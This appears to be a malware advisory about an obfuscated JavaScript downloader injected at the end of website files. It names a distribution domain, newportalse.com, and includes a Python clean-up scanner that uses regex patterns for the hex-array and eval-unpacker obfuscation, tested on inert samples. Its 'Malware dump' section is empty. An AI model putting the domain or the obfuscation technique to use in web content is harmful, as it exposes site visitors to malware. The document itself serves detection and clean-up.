JS:Cruzer-B, JS/Obfuscated, JS/Cruzer.C.gen, JS/TrojanDownloader.Agent.NKW

Description:

A malicious, encoded JavaScript file was found inside the site content and is being used to distribute malware (from newportalse.com and other domains). Any user visiting the infected site could be compromised. Desktop antivirus will flag it as JS:Cruzer-B, JS/Obfuscated, JS/Cruzer.C.gen, JS/TrojanDownloader.Agent.NKW and others, depending on the intermediary domains and AV product.

Domains used in this attack:

newportalse.com
(and many others)

Affecting:

Any web site (no specific target).

Clean up:

This malware is generally hidden at the bottom of the .html or JavaScript files.
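One way to locate candidate files during clean-up, as an added example that is not part of the original write-up: it inspects the end of each .html/.htm/.js file for the obfuscation shape this family uses, a `_0x`-named array of hex-escaped strings followed by an `eval(function(` unpacker that reads from that array. The window size, function names and sample bytes are assumptions made for the example, and the strings are assumed to be stored on disk as `\xNN` escapes.

```python
import re
from pathlib import Path
from typing import Optional

TAIL_BYTES = 8192                      # assumed window; the injection sits at the file's end
EXTENSIONS = {".html", ".htm", ".js"}  # file types named in the clean-up note

# Array variable named _0x<hex> whose first string is a long run of \xNN escapes.
HEX_ARRAY = re.compile(rb"var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[\s*[\"'](?:\\x[0-9a-fA-F]{2}){8,}")
# Self-invoking unpacker handed straight to eval().
EVAL_UNPACKER = re.compile(rb"eval\s*\(\s*function\s*\(")


def scan_tail(data: bytes) -> Optional[dict]:
    """Return a finding if the end of `data` holds the array + eval unpacker pair."""
    tail = data[-TAIL_BYTES:]
    arr = HEX_ARRAY.search(tail)
    if arr is None:
        return None
    unpacker = EVAL_UNPACKER.search(tail, arr.end())
    # The unpacker must also read from the array, which ties the two parts together.
    if unpacker is None or arr.group(1) not in tail[unpacker.end():]:
        return None
    return {"array": arr.group(1).decode(), "offset": len(data) - len(tail) + arr.start()}


def scan_tree(root: str) -> list:
    """Scan .html/.htm/.js files under `root`; return (path, finding) pairs."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            finding = scan_tail(path.read_bytes())
            if finding:
                hits.append((str(path), finding))
    return hits


# Constructed, inert samples (not the real payload): page content, then an appended tail.
CLEAN = b"<html><body><script>var menu=['a','b'];</script></body></html>\n"
INFECTED = CLEAN + (
    rb'var _0xabcd=["\x61\x62\x63\x64\x65\x66\x67\x68","\x7C"];'
    rb"eval(function(p){return p}(_0xabcd[0]));"
)

if __name__ == "__main__":
    print(scan_tail(CLEAN))
    print(scan_tail(INFECTED))
```

The reported offset is the byte position where the appended array begins, which gives a starting point for reviewing what follows it in the file.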

Malware dump (sample of malware):

